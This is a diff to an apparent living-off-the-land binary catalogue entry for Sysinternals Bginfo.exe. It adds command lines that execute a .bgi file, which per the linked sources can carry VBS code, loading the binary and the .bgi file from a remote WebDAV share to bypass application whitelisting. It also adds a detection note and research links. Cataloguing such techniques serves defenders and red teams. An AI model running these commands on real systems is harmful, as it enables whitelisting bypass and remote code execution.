Updated Bginfo.exe

OtherMSBinaries/Bginfo.md

@@ -3,11 +3,35 @@
 * Functions: Execute
 
 ```
-bginfo.exe bginfo.bgi /popup /nolicprompt
-(Add vbs code inside .bgi file)
+bginfo.exe bginfo.bgi /popup /nolicprompt    
+
+"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt    
+
+"\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt   
 ```
 
 Acknowledgements:
 * Oddvar Moe - @oddvarmoe
-   
-   
+
+Code sample:
+* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1
+
+Resources: 
+* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/   
+* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/  
+* https://twitter.com/Oddvarmoe/status/865330067630694400   
+* https://twitter.com/ItsReallyNick/status/996133093613424641   
+* https://github.com/3gstudent/bgi-creater   
+* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/  
+
+Full path:
+```
+No fixed path
+```
+
+Notes:
+Used to set background image in Windows with details about the environment
+
+
+Detection:
+Bginfo.exe requesting files externally or running VBS scripts.